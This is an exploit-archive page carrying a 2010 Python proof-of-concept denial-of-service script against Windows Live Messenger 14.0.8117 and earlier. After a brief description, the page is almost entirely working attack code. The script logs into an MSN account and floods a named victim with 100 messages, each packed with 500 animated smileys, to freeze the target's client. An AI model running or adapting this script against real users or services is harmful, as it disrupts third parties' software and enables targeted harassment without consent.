Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtTheLeader1337DAY-ID-13656
HistoryAug 11, 2010 - 12:00 a.m.

Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service

2010-08-1100:00:00
TheLeader
0day.today
9
JSON

Exploit for windows platform in category dos / poc

======================================================================
Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service
======================================================================

# Exploit Title: Windows Live Messenger <= 14.0.8117 animation remote Denial of Service
# Date: 11/08/2010
# Author: TheLeader
# Email: gsog2009 [a7] hotmail [d0t] com
# Software Link: http://explore.live.com/windows-live-messenger
# Version: 14.0.8117 and prior
# Tested on: Windows 7 x86
 
# msnlib required: http://blitiri.com.ar/p/msnlib/
# Greets: forums.hacking.org.il - <3UGUYS
# SP. thx goes to Alberto <albertito [a7] blitiri [d0t] com [d0t] ar> for
#              the msnlib library / Original msnbot example (that I modded =] )
 
# Description:
# Windows Live Messenger is prone to a Denial of Service attack. By sending
# specially crafted messages that contain a large number of animations ("Smileys"),
# it is possible to make WLM consume large amounts of memory and CPU while
# it attempts to render the animated images, causing it to stop responding.
 
import sys
import time
import select
import socket
import thread
import msnlib
import msncb
 
payload = ":'(" * 500
 
m = msnlib.msnd()
m.cb = msncb.cb()
 
def do_work():
    time.sleep(15)
     
    for i in range(100):
        print m.sendmsg(victim, payload)
     
    time.sleep(30)
    quit()
 
 
try:
    m.email = sys.argv[1]
    m.pwd = sys.argv[2]
    victim = sys.argv[3]
except:
    print "Usage: msnkeep.py account password victim_account"
    sys.exit(1)
 
m.login()
m.sync()
 
m.change_status("online")
 
def quit():
    try:
        m.disconnect()
    except:
        pass
    sys.exit(0)
 
thread.start_new_thread(do_work, ())
 
while 1:
    t = m.pollable()
    infd = t[0]
    outfd = t[1]
 
    try:
        fds = select.select(infd, outfd, [], 0)
    except:
        quit()
     
    for i in fds[0] + fds[1]:
        try:
            m.read(i)
        except ('SocketError', socket.error), err:
            if i != m:
                m.close(i)
            else:
                quit()
 
    time.sleep(0.01)



#  0day.today [2018-04-09]  #
JSON